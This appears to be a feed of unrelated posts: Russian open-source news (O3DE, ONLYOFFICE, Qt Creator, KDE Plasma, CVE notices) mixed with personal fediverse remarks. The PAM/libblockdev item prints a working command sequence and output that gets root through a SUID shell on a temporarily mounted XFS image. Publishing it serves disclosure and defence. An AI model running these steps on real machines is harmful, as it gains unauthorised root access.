Выпуск игрового движка Open 3D Engine 25.05, открытого компанией Amazon

Исходный код движка O3DE был открыт в июле 2021 года компанией Amazon и основаны на коде ранее развиваемого проприетарного движка Amazon Lumberyard, построенного на технологиях движка CryEngine, лицензированных у компании Crytek в 2015 году. После открытия кодовой базы развитие движка курирует некоммерческая организация Open 3D Foundation, созданная под эгидой Linux Foundation. Помимо Amazon к совместной работе над проектом подключились такие компании, как Epic Games, Adobe, Huawei, Microsoft, Intel и Niantic.

Движок включает в себя интегрированную среду для разработки игр, многопоточную систему фотореалистичного рендеринга Atom Renderer с поддержкой Vulkan, Metal и DirectX 12, расширяемый редактор 3D-моделей, систему анимирования персонажей (Emotion FX), систему разработки полуфабрикатов (prefab), движок симуляции физических процессов в реальном режиме времени и математические библиотеки, использующие инструкции SIMD. Для определения игровой логики может использоваться среда визуального программирования (Script Canvas), а также языки Lua и Python.

Проект изначально рассчитан на возможность адаптации под свои нужды и имеет модульную архитектуру. Всего предлагается более 30 модулей, поставляемых в виде отдельных библиотек, пригодных для замены, интеграции в сторонние проекты и использования по отдельности. Например, благодаря модульности разработчики могут заменить рендер графики, звуковую систему, поддержку языков, сетевой стек, физический движок и любые другие компоненты.

Среди изменений в новой версии:

• Полностью переделан инструмент Trackview, применяемый для создания интерактивной анимации в играх.
• Проведена работа по повышению производительности движка рендеринга Atom и реализации в нём возможности работы одновременно с несколькими GPU.
• Реализована поддержка нового стандартизированного интерфейса симуляции в модуле ROS2, интегрируемом с инструментарием Robot Operating System (ROS2) и предоставляющем драйверы, реализации алгоритмов, компоненты, ресурсы и утилиты для создания симуляторов роботов.
• Компании Open Robotics, NVIDIA и Robotec.ai совместно модернизировали возможности платформы для построения сложных симуляторов.
• Компания Meta упростила интеграцию инструментария Quest Mobile SDK (Oculus Mobile SDK) с движком O3DE - автоматизированы операции настройки окружения для систем виртуальной реальности и управления пакетами с использованием O3DE.
• Упрощён процесс подготовки и передачи изменений в проект. Для документации к API задействована система модулей Hugo, благодаря которой разработчики теперь могут отправлять изменения к документации в форме небольших pull-запросов.
• Повышено качество работы среды визуального программирования Script Canvas.
• Добавлена поддержка свежих версий Android SDK и Gradle.
• Сокращено время загрузки и повышена производительность приложений для платформы Android.
• Проведена оптимизация производительности компонентов движка для разработки игр для мобильных платформ. В некоторых ситуациях, например, при использовании констант шейдеров, удалось добиться прироста производительности на 40%.
• Стабилизирована возможность задействования нескольких разных GPU для отрисовки одной сцены.
• Зависимости обновлены для поддержки последней версии спецификации OpenXR.

На панелях ПМЭФ.

Уязвимости в библиотеке libxml2, приводящие к выполнению кода

Уязвимость CVE-2025-6170 вызвана переполнением буфера в реализации интерактивной оболочки xmllint, применяемой для разбора XML-файлов. Переполнение возникает при обработке очень длинных аргументов команд из-за отсутствия корректной проверки размера входных данных перед копированием данных функцией strcpy(). Для эксплуатации уязвимости атакующий должен иметь возможность влиять на команды, передаваемые в утилиту xmllint. Патч для устранения уязвимости пока недоступен.

Вторая потенциально опасная уязвимость CVE-2025-6021 присутствует в реализации функции xmlBuildQName() и приводит к записи данных за пределы буфера из-за целочисленного переполнения при вычислении размера буфера на основе префикса и локального имени. Для устранения уязвимости подготовлен патч. Исправление включено в состав выпуска libxml2 2.14.4. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Остальные три проблемы приводят к аварийному завершению из-за обращения к уже освобождённой области памяти в функции xmlSchematronGetNode (CVE-2025-49794), разыменования нулевого указателя в функции xmlXPathCompiledEval (CVE-2025-49795) и неправильной обработки типов (Type Confusion) в функции xmlSchematronFormatReport (CVE-2025-49796). Для устранения данных уязвимостей рассматривается возможность удаления из libxml2 поддержки языка разметки Schematron.

Дополнительно отмечается наличие трёх неисправленных уязвимостей в библиотеке libxslt, оставшейся без активного сопровождающего. Информация по данным проблемам пока не раскрывается и запланирована к публикации 9 июля, 13 июля и 6 августа. Неисправленные и публично не обнародованные уязвимости также отмечаются в связанных с GNOME проектах gvfs, libgxps, gdm, glib, GIMP и libsoup.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63431

Обновление антивирусного пакета ClamAV 1.4.3 и 1.0.9 с устранением уязвимостей

• CVE-2025-20260 - ошибка в коде разбора файлов в формате PDF, приводящая к записи данных за пределы выделенного буфера. Проблема проявляется в конфигурациях, максимальный размер настроек file-size и scan-size в которых равен или превышает 1024MB и 1025MB соответственно. Эксплуатация уязвимости возможна начиная с выпуска 1.0.0 и может привести к выполнению кода с правами процесса ClamAV.
• CVE-2025-20234 - ошибка в коде разбора файлов в формате UDF, приводящая к чтению данных из области памяти за пределами выделенного буфера. Проблема может привести к аварийному завершению процесса или утечки данных из памяти во временный файл. Уязвимость проявляется начиная с версии 1.2.0.
• Обращение к памяти после её освобождения в модуле распаковки архивов в формате xz (CVE не назначен). Проблема вызвана ошибкой во встроенной в код ClamAV библиотеке lzma-sdk, которая была устранена в основном проекте в выпуске lzma-sdk 18.03, опубликованном 2018 в году без упоминания устранения уязвимости. Уязвимость проявляется во всех версиях ClamAV, начиная с 0.99.4.
  
  Источник: https://www.opennet.ru/opennews/art.shtml?num=63430

#macro #tokina300mm #fern

Почему сайты издательств это всегда какой-то ад в плане управления пользователями?

И знаете в чем проблема проблема? Если в домене элеткронной почты (то есть после @) есть две точки, то кнопка "Создать аккаунт" не становится активной. Обожаю эти ваши самодельные валидаторы адреса электронной почты от школоты в "крупнейшем издательстве России, одном из крупнейших издательств Европы, входит в мировой топ-50" (википедия).

Опубликован офисный пакет ONLYOFFICE 9.0

В ONLYOFFICE заявлена полная совместимость с форматами MS Office и OpenDocument. Среди поддерживаемых форматов: DOC, DOCX, ODT, RTF, TXT, PDF, HTML, EPUB, XPS, DjVu, XLS, XLSX, ODS, CSV, PPT, PPTX, ODP. Предусмотрена возможность расширения функциональности редакторов через плагины, например, доступны плагины для создания шаблонов и добавления видео с YouTube. Отдельно развивается открытый продукт ONLYOFFICE DesktopEditors, построенный на единой кодовой базе с online-редакторами и объединяющий в одном наборе клиентские и серверные компоненты, оформленные для самодостаточного использования на локальной системе пользователя и способные работать без обращения к внешнему сервису.

Основные новшества:

• Обновлён интерфейс пользователя в редакторах документов, электронных таблиц, презентаций и PDF-файлов. Добавлены новые темы оформления Modern Light и Modern Dark.
• Добавлен отдельный интерфейс для просмотра диаграмм (Diagram Viewer), позволяющий напрямую открывать файлы с диаграммами без вызова сторонних приложений.
• Расширены возможности встроенного AI-ассистента. Добавлена поддержка оптического распознавания текста на изображениях в PDF-документах, позволяющая копировать текст из PDF-файлов c отсканированными страницами.
• Добавлены AI-инструменты для автоматизации работы с электронными таблицами, позволяющие использовать запрос на естественном языке для выполнения действий с данными, например, можно попросить сформировать формулы для сложного набора данных.
• Предоставлена возможность использования AI для автоматизации повторяющихся действий и создания макросов на основе описания задачи на естественном языке. Добавлен AI-конвертер из VBA в JavaScript.
• В редактор PDF-файлов добавлена поддержка совместного заполнения или создания форм ввода, позволяющая одновременно нескольким участникам работать над одной формой. Предоставлена возможность перегруппировки страниц в режиме Drag & Drop, перетаскивая мышью эскизы страниц в навигационной панели. Реализована поддержка использования комбинаций клавиш Ctrl + C и Ctrl + V для копирования и вставки страниц через буфер обмена.
• В редакторе документов в панели инструментов реализована новая кнопка для быстрой настройки обрамления содержимого.
• Добавлена возможность добавления собственных кнопок управления контентом, функциональность которых обеспечивается плагинами. Улучшена визуализация при отслеживании изменений.
• В редакторе электронных таблиц предоставлена возможность прямой подстановки данных из внешних электронных таблиц.
• Добавлена поддержка асинхронных вычислений с возможностью создания маросов, содержащих функции-обработчики запросов.
• В редакторе презентаций в режиме слайдшоу реализована возможность показа расширенной анимации в слайдах.
• Улучшена визуализация данных и расширены возможности для настройки диаграмм. Добавлена поддержка графиков роста/спада. Предоставлена возможность использования элементов форматирования TextArt в метках диаграмм.
• Добавлена поддержка чтения данных в форматах md (Markdown), odg (OpenDocument Graphic), vsdx (Visio) и xlsb.
• В интерфейсе проверки правописания реализовано сохранение последнего выбранного языка.

помнится, ещё лет 10 назад начинали просачиваться новости про китайские дешевые искусственные яйца, которые "делают из кальций карбоната, бензойной кислоты, парафина, пищевого красителя, гипса и некоторых других компонентов"

I've just committed a new manual page to #FreeBSD: tracing(7), an introduction to #tracing and #performance #monitoring facilities.

It'll take a moment before it is available for readers on man.freebsd.org, so for the time being you can grab a copy from here (https://cgit.freebsd.org/src/plain/share/man/man7/tracing.7?id=c29459f901dc73e1ebe1e654da2677cc0b7bd296) and open it with man(1).

#DTrace #dwatch #ktrace #osdev #foss #ptrace #utrace #truss #boottrace #tslog

@prahou I had the opportunity to see a lot of Miró's work when I visited Barcelona recently, amazing stuff.

I just released honeybee 0.2.0! Honeybee is a simple daemon for making calls via xmpp. For the changelog, see the git commit: https://git.sr.ht/~anjan/honeybee/commit/9f3dfdb4fac505161690aa7cddd0853ac00a3f23

It should be available in Alpine testing repos soon.

Пишут, что Папа Римский Лев XIV

оказался родственником Хиллари Клинтон, Мадонны, Анджелины Джоли, Джастина Бибера и Джастина Трюдо. Их связывает предок из Квебека, живший в XVII веке.

Кто-нибудь может объяснить логику этой надписи?

Релиз среды разработки Qt Creator 17

Краткий список улучшений и исправлений:

• Тёмная и светлая темы "2024", добавленные в Qt Creator 15 и обновлённые в Qt Creator 16, теперь используются по умолчанию. Пересмотрены и обновлены иконки Qt Creator для соответствия новому внешнему виду и достижения большей целостности интерфейса.
• Репозиторий плагинов, используемый по умолчанию, перенесён на GitHub. Дополнительные репозитории плагинов теперь могут быть добавлены в "Preferences > Extensions > Browser" (использовать на свой страх и риск). Расширена отображаемая информация для ещё не установленных плагинов. Добавлена установка плагинов с помощью перетаскивания (drag-n-drop) архива на панель плагинов.
• Проекты: Профили запуска сделаны частью сборочных профилей (ранее были полностью независимы). Теперь каждый профиль запуска принадлежит определённому профилю сборки, и переключение текущего профиля сборки также переключает набор доступных профилей запуска, что реализует часто запрашиваемый пользователями сценарий: возможность использования разных параметров запуска, таких как аргументы командной строки или переменные окружения, для разных сборочных профилей, таких как Debug и Release.

  Значения одних профилей запуска теперь можно копировать в другие с помощью кнопки "Copy into This" вне зависимости от принадлежности к конкретному сборочному профилю.

• CMake: Добавлена возможность установки недостающих компонентов Qt с помощью Qt Online Installer (если Qt Creator с ним слинкован) в случае неудавшегося вызова cmake, вызванного недостающими компонентами Qt. Новое поведение полагается на функциональность "Preferences > CMake > General > Package manager auto setup", требующую запуска CMake из Qt Creator.
• Python: Добавлена поддержка открытия проектов pyproject.toml; они же теперь создаются по умолчанию для новых PySide-проектов, созданных с помощью wizard-ов в Qt Creator. Открытие проектов .pyproject всё ещё поддерживается.
• Редактирование C++: Готовые исполняемые файлы теперь собираются с помощью LLVM 20.1.3 для обновлённой поддержки C++. Исправлена поддержка операторов строковых литералов Qt (например, "_ba" и "_L1"). Исправлены некоторые проблемы со встроенными функциями и макросами, используемыми подобно функциям.

  Добавлены изменения, призванные упростить жизнь разработчиков при использовании классов Qt, не используемых ранее в проекте (не найденных Code Model): новый quick fix (жёлтая лампочка в редакторе на строке с новым для проекта классом Qt) позволяет добавить недостающие директивы #include в исходники и недостающие модули Qt в файл проекта. Такой же quick fix на строках с директивами #include позволяет добавить необходимые модули Qt в файл проекта.

• QML: Опции стиля кода в "Preferences > Qt Quick > Code Style" теперь позволяют использовать интегрированный в "QML language server" qmlformat, равно как встроенный форматировщик (formatter) или пользовательский форматировщик, совместимый с qmlformat. Переформатирование документа теперь доступно в контекстном меню и в меню "Tools > QML/JS".

  В панель инструментов редактора кода QML добавлена новая кнопка для открытия файлов .ui.qml в Qt Design Studio.

• Analyzer: Для Axivion добавлена поддержка локальных информационных панелей (dashboard) с новыми кнопками "Local Build" и "Local Dashboard" в интерфейсе Issues в режиме Debug > Axivion. Добавлены различные настройки в "Preferences > Analyze > Axivion".
• Управление версиями: Для git добавлены различные действия "diff", работающие со "staged" изменениями вместо "unstaged". В подсказки для Instant Blame добавлены действия для отката изменений. В диалоге "Add Tag" теперь можно создавать аннотированные теги.

@dside
прямо сейчас пишу этот коммент с ноутбука 2011-го года, основной и единственный "рабочий инструмент". справляется нормально. оперативы только докупить пришлось.

А доя походов вот. Не знаю, насколько оправдано исторически, но такая заточка на рынке стала называться «манси» (в ряду с «якутом») - получается что-то вроде стамески, как «сканди», но примерно до середины обуха только с одной стороны (иначе можно сказать, что с другой стороны тоже заточка в ноль, но начиная от самого обуха). Сам нож небольшой, но обух довольно толстый, 5 мм или даже шире.

Уязвимости в PAM и libblockdev, позволяющие получить права root в системе

Процесс udisks применяется практически во всех дистрибутивах Linux и предоставляет интерфейс D-Bus для выполнения операций с накопителями, таких как монтирование и форматирование. Для совершения действий с накопителями udisks вызывает функции библиотеки libblockdev. Доступ к udisks по умолчанию открыт только для пользователей, работающих в контексте "allow_active", т.е. имеющих физический доступ к компьютеру и подключившихся через локальную консоль или запустивших графический сеанс. Пользователи, подключающиеся удалённо, например, по ssh, не попадают в этот контекст и напрямую не могут эксплуатировать уязвимость.

Для обхода данного ограничения можно использовать трюк, позволяющий поднять уровень аутентификации до "allow_active" через манипуляции с запуском утилитой systemctl пользовательского сервиса, который polkitd воспримет как признак локального сеанса. Суть метода в том, что polkitd определяет наличие физического доступа и присваивает уровень "allow_active" на основе косвенных признаков, на которые можно повлиять. Ограничения метода в том, что для обмана polkitd требуется, чтобы в системе уже был активен сеанс локального пользователя с физическим доступом.

Вторым методом получения прав "allow_active" является эксплуатация уязвимости (CVE-2025-6018) в PAM (Pluggable Authentication Modules), которую исследователи из Qualys выявили в ходе анализа уязвимости в libblockdev. Уязвимость позволяет любому пользователю, в том числе подключившемуся по SSH, выполнять операции в контексте "allow_active". Проблема специфична для настроек PAM в openSUSE Leap 15 и SUSE Linux Enterprise 15, и проявляется только в этих дистрибутивах.

В модуле pam_env в openSUSE и SUSE по умолчанию включено чтение файла ~/.pam_environment. Через данный файл пользователь может выставить переменные окружения XDG_SEAT=seat0 и XDG_VTNR=1, которые при дальнейшей обработке будут восприняты как признак физического присутствия пользователя, даже если фактически вход осуществлён по SSH. Модуль pam_env также вызывается при подключении по ssh в Debian 12 и Ubuntu 24.04 (в Debian 13 и Ubuntu 24.10+ он отключён), но выставление переменных окружения в данных дистрибутивах не может применяться для повышения уровня доступа до "allow_active", так как pam_env вызывается на финальном этапе после загрузки модуля pam_systemd и выставленные переменные окружения не могут повлиять на параметры сеанса.

Что касается уязвимости в libblockdev, то атакующий может примонтировать образ произвольной файловой системы в loop-режиме, разместив в этом образе исполняемый файл с флагом SUID root или специальное устройство (/dev/mem) для низкоуровневого доступа к дискам или памяти. Для блокирования подобных атак образы ФС монтируются системой с флагами nosuid и nodev, но уязвимость в libblockdev даёт возможность примонтировать образ без флагов nosuid и nodev. Суть уязвимости в том, что udisks позволяет пользователю с уровнем доступа "allow_active" менять размер своих файловых систем и libblockdev в процессе выполнения данной операции временно монтирует ФС без выставления флагов nosuid и nodev.

Таким образом атака сводится к созданию loop-устройства на базе образа ФС XFS, в котором размещён suid root файл, инициирования операции изменения размера loop-устройства и отслеживанию момента его монтирования в каталог /tmp/blockdev*:

   victim> killall -KILL gvfs-udisks2-volume-monitor

   victim> udisksctl loop-setup --file ./xfs.image --no-user-interaction
   Mapped file ./xfs.image as /dev/loop0.

   victim> while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &

   victim> gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

   Error: GDBus.Error:org.freedesktop.UDisks2.Error.Failed: Error resizing filesystem on /dev/loop0: Failed to unmount '/dev/loop0' after resizing it: target is busy

   -r-sr-xr-x. 1 root root 1406608 Jun 18 09:42 /tmp/blockdev.RSM429/bash

   victim> /tmp/blockdev*/bash -p

   victim# id

   uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
                       

Уязвимость в libblockdev пока устранена только в виде патчей. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2). В качестве обходных путей для блокирования уязвимости можно изменить правило доступа к операции "org.freedesktop.udisks2.modify-device" в polkit, изменив в файле /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy значение параметра "allow_active" с "yes" на "auth_admin".

Дополнительно можно отметить раскрытую несколько часов назад уязвимость (CVE-2025-6020) в пакете linux-pam, позволяющую локальному пользователю получить права root. Модуль pam_namespace должным образом не проверял файловые пути, подконтрольные пользователю, что позволяло через манипуляции с символическими ссылками и достижением состояния гонки добиться перезаписи привилегированных файлов в системе. Уязвимость устранена в выпуске linux-pam 1.7.1. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Источник: https://www.opennet.ru/opennews/art.shtml?num=63424

Современные линогравюры инуитов из региона Нунавик. Это попытки возрождения традиции гравюры в этих общинах.

Современные линогравюры инуитов из региона Нунавик. Это попытки возрождения традиции гравюры в этих общинах.

Honknet users, please contact your instance administrator to obtain a full copy of the terms of service. Read and review, sign in triplicate, then store in a safe place. You won't need it today, but someday you will, and boy howdy will you be glad to have it then.

в культуре славянской грибы, напротив, воспринимаются в целом позитивно. старичок, помогающий заплутавшим малолеткам, зачастую выглядит как антропоморфный боровик или другой полезный гриб, которых различают до деталей вплоть до груздей белых/черных

так что перенесенная на наш гумус версия 'the last of us' будет полной противоположностью исходнику. как весенняя/светлая история, в которой пораженные спорами — и преобразованные ими — люди-маслята подносят всем по рюмочке клюковки

Обновление X.Org Server 21.1.17 с устранением 6 уязвимостей

Выявленные уязвимости:

• CVE-2025-49176 - целочисленное переполнение в реализации расширения Big Requests, позволяющего отправлять запросы, размером более 16 бит. Уязвимость проявляется с выпуска X11R6.0 (1994 год).
• CVE-2025-49179 - целочисленное переполнение в реализации расширения X Record, возникающее при отправке слишком больших значений числа клиентов или диапазонов. Уязвимость проявляется с выпуска X11R6.1 (1996 год).
• CVE-2025-49180 - целочисленное переполнение в реализации расширения RandR. Уязвимость проявляется с выпуска 1.13 RC1 (2012 год).
• CVE-2025-49178 - возможность создания ситуации, приводящей к блокированию запросов других клиентов. Уязвимость проявляется с выпуска Xorg 1.10.0
• CVE-2025-49175 - чтение из памяти вне границы буфера в расширении X Rendering, возникающее при выполнении операций с анимированными курсорами. Уязвимость проявляется с выпуска XFree86 4.3.0 (2003 год).
• CVE-2025-49177 - утечка данных в реализации расширения XFIXES, вызванная отсутствием проверки размера запроса клиента в обработчике XFixesSetClientDisconnectMode (клиент может отправить более короткий запрос и прочитать данные предыдущего запроса. Уязвимость проявляется с выпуска Xorg Server 21.1 RC1 (2011 год).

@continue
Наверное, я забыл сервер перегрузить. Сейчас есть.

Яндекс быстро учится у гугла - такой заметный прогресс превращения карт в говно...

Обнаружили могилу.

#ЛенинградНутряной

Релиз среды рабочего стола KDE Plasma 6.4

Основные изменения:

• Добавлена поддержка использования для каждого виртуального рабочего стола своей мозаичной раскладки окон.
  
  
• Тема оформления Breeze Dark сделана темнее для более контрастного отображения текста и элементов переднего плана на тёмном фоне.
• Реализовано затемнение фона рабочего стола и текущего окна во время вывода диалога аутентификации для более заметного акцентирования внимания на нём.
• В меню приложений Kickoff и виджете Application Launcher реализованы зелёные метки для выделения из общей массы недавно установленных программ. Метки исчезают через три дня после первого запуска нового приложения.
• В KRunner улучшена группировка результатов поиска - действия, связанные с сеансом и загрузкой, теперь включены в приоритетный список, выводимый в первую очередь. Улучшена навигация в KRunner с использованием клавиатуры. Обеспечена визуализация цвета - при вводе кодов представления цвета (например, #112233) или названий цветов, KRunner теперь показывает как выглядит цвет.
• Добавлено предупреждение, выводимое при попытке обращения к микрофону из приложения, если микрофон переведён в настройках в беззвучный режим.
• В композитном менеджере KWin реализована возможность включения расширенного динамического диапазона яркости для экранов, не поддерживающих HDR, на которых HDR имитируется при помощи изменения яркости подсветки.
• Улучшена поддержка Wayland. В композитном менеджере KWin задействована стабильная версия Wayland-протокола ext-data-control, необходимого для корректной работы с буфером обмена (ранее использовался протокол wlr-data-control-unstable-v1).
• Добавлена поддержка Wayland-протокола ext-idle-notify.
• Добавлена поддержка Wayland-протокола fifo, позволяющего использовать FIFO-механизм (первым пришёл - первым ушёл) обработки очереди обновления содержимого отображаемой поверхности. При помощи указанного протокола при выводе можно обойтись ожиданием завершения вертикальной развёртки (vblank) вместо использования callback-вызовов при каждой готовности отобразить новый кадр, что решает проблему с высокой нагрузкой на GPU при использовании VSync.
• Добавлена поддержка Wayland-протокола xdg-session-management. Изменение позволяет восстанавливать состояние окон прерванного сеанса в окружениях на основе протокола Wayland, например, в случае аварийного завершения композитного сервера или приложения.
• В окружении на базе Wayland добавлена возможность использования относительного позиционирования на графических планшетах, при котором позиция стилуса определяется относительно предыдущего положения, а не абсолютной позиции на поверхности планшета. Для работы с Wayland адаптирована возможность управления графическим курсором при помощи клавиатуры.
• Кодовая база kwin разделена на kwin_x11 и kwin_wayland.
• В KWin добавлена возможность настройки продолжительности действия эффекта затухания рабочего стола ("Fade Desktop").
• Добавлена поддержка HDR-видео в формате P010.
• Добавлена поддержка xdg-портала Clipboard, предоставляющего доступ к буферу обмена для приложений, запускаемых в изолированных окружениях, например, поставляемых в формате Flatpak.
• Реализована возможность переключения между окнами через сочетания клавиш Meta+Tab и Meta+Shift+Tab.
• Приложениям, использующим XWayland, предоставлена возможность управления клавиатурой и указателем мыши без вывода запросов подтверждение подобных операции. По умолчанию данная возможность отключена, так как она снижает уровень безопасности системы.
  
  
  
• В конфигураторе улучшен интерфейс страницы настройки дисплея. На системах с одним экраном обеспечено скрытие области выбора раскладки экранов. В многомониторных конфигураций улучшено выделение текущего экрана и представление подсоединённых, но не активированных экранов.
• В конфигуратор добавлен новый раздел "Анимация", в который перенесены настройки анимированных эффектов. В секции "Десктоп-эффекты" оставлены общие эффекты, не связанные с визуализацией перехода из одного состояния в другое.
• В диалоге настройки панели две отдельные кнопки в заголовке преобразованы в меню, что решило проблему с растяжением диалога на системах с локализацией из-за слишком длинных слов на кнопках.
• На странице управления пользователями реализовано предупреждение, показываемое при попытке удаления пользователя с активным сеансом. При подтверждении подобной операции файлы такого пользователя не будут удалены.
• В настройки системного лотка добавлено предупреждение, выводимое при попытке отключить сервис управления буфером обмена.
• Модернизировано оформление диалогов для настройки виджетов часов, словаря, таймера и показа слайд-шоу из выбранных изображений.
• Добавлена настройка для принудительного отключения пиктограмм определённых приложений в системном лотке. Новая возможность может оказаться полезной, когда приложения не содержат внутренних настроек для прекращения показа индикаторов (например, Discord).
• В диалоге настройки панели визуализация макетов размещения панели теперь отражает фактическое положение панели на экране.
• Переработано окно регистрации приложениями клавиатурных комбинаций.
• В диалог настройки действий при двойном клике мышью добавлена область для тестирования изменения перед его применением.
• В конфигураторе на странице с параметрами дисплея обеспечено отображение нецелых значений обновления экрана (например, 59.94Hz). Добавлена настройка для ограничения максимальной глубины цвета.
• Упрощена настройка кнопок стилуса. Добавлена возможность повторной калибровки графического планшета. Добавлен режим симуляции поведения мыши при использовании графического планшета.
  
  
  
• В системном лотке теперь показывается информация о ненастроенном виджете с прогнозом погоды.
• Улучшен виджет управления громкостью, в котором теперь показывается название контента, воспроизводимого в приложениях, выставляющих подобные метаданные (например, в браузерах). Добавлены текстовые заголовки для устройств ввода и вывода звука. Повышена наглядность при использовании нескольких устройств. Ускорен вызов окна управления буфером обмена комбинацией клавиш Meta+V.
• В виджет управления воспроизведением (Media Controller) добавлена поддержка комбинаций клавиш Ctrl+Tab и Alt+[number] для переключения между вкладками и источниками.
• В виджет с корзиной добавлен индикатор выполнения операции очистки (вращающийся спинер).
• В апплет, управляющий медиапроигрывателями, поддерживающими протокол MPRIS, добавлен переключатель скорости воспроизведения.
• В виджете управления встроенными и внешними дисками (Disks & Devices) реализована проверка состояния разделов и вывод кнопки для устранения выявленных ошибок.
• Оптимизирована эвристика центровки всплывающих окон виджетов, относительно экрана или панели.
• Повышена точность определения и показа виджетом Power & Battery информации о состоянии аккумуляторов Bluetooth-устройств.
• Реализован виджет для калибровки HDR.
• На экране блокировки системы добавлена возможность настройки таймаута показа приглашения входа. В многомониторных конфигурациях часы и интерактивные элементы интерфейса на экранах блокировки и входа в систему теперь показываются только на одном активном экране и скрываются на остальных экранах, не имеющих фокуса ввода.
  
  
  
• Переработано оформление страницы с информацией о системе и редактора меню KMenuEdit, позволяющего изменять содержимое и перегруппировывать элементы в меню приложений. В KMenuEdit добавлена возможность настройки постоянного запуска выбранных приложений на дискретном GPU.
• Изменена обработка уведомлений во время открытия приложений в полноэкранном режиме. Вместо игнорирования некритичных уведомлений при работе с полноэкранными программами теперь автоматически включается режим "не беспокоить". Отличия в том, что после выхода из полноэкранного режима будет показано предупреждение о наличии пропущенных уведомлений. При желании новое поведение можно отключить в настройках.
• Реализован график для наглядной оценки изменения скорости копирования файлов. График доступен на странице "Детали", на которую можно перейти из уведомления о копировании файла.
• Обеспечено сохранение интерактивных кнопок в уведомлениях, показываемых во всплывающем окне с историей уведомлений.
• Для уведомлений реализована поддержка выбора типа звукового оповещения (например, при получении письма может воспроизводиться отдельный звук, характерный для прихода сообщения).
• Предоставлена возможность запуска менеджера приложений Discover прямо из уведомлений о появлении обновлений.
• Вывод уведомлений о недостаточном свободном дисковом пространстве реализован почти для всех разделов (за исключением разделов в режиме только для чтения и разделов переполненных до монтирования), а не только для / и /home. Добавлена возможность настройки процента наполнения, при достижении которого начнёт выдаваться предупреждение.
• При перемещении мышью файла на рабочий стол или в файловый менеджер, если файл перемещается в рамках одного диска, то по умолчанию файл теперь перемещается в новое место без вывода запроса выбора операции с файлом.
• В приложении System Monitor модернизировано оформление обзорного режима и истории измерений. Добавлены индикатор нагрузки на GPU и диаграммы наличия свободного места на отдельных дисках. Для GPU Intel и AMD добавлена возможность отслеживания нагрузки в привязке к отдельным приложениям. Добавлена группа "Фоновые сервисы" для оценки потребления ресурсов системными компонентами. Добавлена отдельная страница с состоянием датчиков, на которой, например, можно посмотреть текущую температуру GPU и CPU.
• В инструментарий для интеграции с браузерами, позволяющий управлять воспроизведением мультимедиа в браузерах с рабочего стола, добавлена поддержка flatpak-пакетов с альтернативными браузерами на движках Chromium и Firefox, такими как LibreWolf и Ungoogled Chromium.
• Повышена производительность при использовании режима ночной подсветки и при изменения яркости (в данных режимах наблюдалось снижение частоты кадров при отображении видео).

I've completed bug fixes in #RetroForth's #nga vm for the internal UTF8 to UTF32 conversions. This was one of the two blockers holding off a new release, so I'm now hoping to have version 2025.6 out near the end of the month.

TIL: что бы увековечить имя Терри Пратчетта люди начали добавлять в инфраструктуру интернета сообщение GNU Terry Pratchett

В серии книг "Плоский мир" присутствуют клик-башни (то есть башни-семафоры), передающие сообщения "по цепочке". Перед сообщением идут управляющие коды, это как раз то самое GNU:

• G: отправь сообщение дальше (следующей башне)
• N: не заноси в журнал это сообщение
• U: на последней (в линии) башне отправь это сообщение обратно

То есть закодирован вечный цикл отправки сообщения по всей линии башен (туда и обратно). А теперь люди в память о Терри Пратчетте добавляют необязательный заголовок X-Clacks-Overhead в разные части инфраструктуры (например в HTTP сервер), что бы почтить память писателя.

– А я знаю про «отправку домой», – сказала Принцесса. – И знаю, что души погибших семафорщиков остаются на Магистрали.
– Кто тебе рассказал? – спросил Дедушка.
Принцесса была достаточно смышленой, чтобы понимать, что кое-кому не поздоровится, если она начнет вдаваться в подробности.
– Слышала, – беззаботно ответила она.
– Тебя просто решили напугать, – сказал Дедушка, глядя на краснеющие уши Роджера.
Но Принцесса не видела в этом ничего страшного. Если уж ты мертв, то намного лучше летать между башнями, чем лежать под землей. Но она была достаточно смышленой и для того, чтобы знать, когда закрыть тему.
После долгой паузы, нарушаемой лишь скрипом новых створок на заслонках, заговорил Дедушка. Как будто что-то не давало ему покоя.
– Мы продолжаем передавать это имя по верхней частоте, – произнес он, и Принцессе показалось, что ветер в решетке заслонок над ее головой завыл с особенной безнадегой, а нескончаемое щелканье стало еще более отчаянным. – Он бы ни за что не захотел возвращаться домой. Он был настоящим семафорщиком. Его имя в этих сигналах, в ветре, в арматуре и в заслонках. Разве ты никогда не слышала, что человек жив, пока не забыто его имя?

(#федичитает #чтопочитать)

$ curl -s -I https://www.bsdhowto.ch/ | grep X-Clacks-Overhead
X-Clacks-Overhead: GNU Terry Pratchett


$ curl -s -I https://git.sr.ht/ | grep clacks
x-clacks-overhead: GNU Terry Pratchett

http://www.gnuterrypratchett.com/
https://xclacksoverhead.org/

В первую очередь надо защитить русский язык от депутатов, сенаторов и президента.

@YaLTeR Don't make the mistake of trying to solve every reported problem or answering every question. Especially if you are managing the project alone. You're seeing the inherent risk of burnout of doing this now, ahead of time, which is very good. Prioritize your own needs and your health.

I am intentionally leaving some small bugs in my projects unfixed. Critical problems should of course be fixed. But there are advantages to leaving some things broken.
Unsolved problems will attract new contributors. Unanswered questions will attract people who are motivated to help others. If you fill out all this space yourself then people might get the impression that no help is needed and spend their time helping out elsewhere.

Разработчики САПР KiCad раскритиковали Wayland и рекомендовали использовать X11

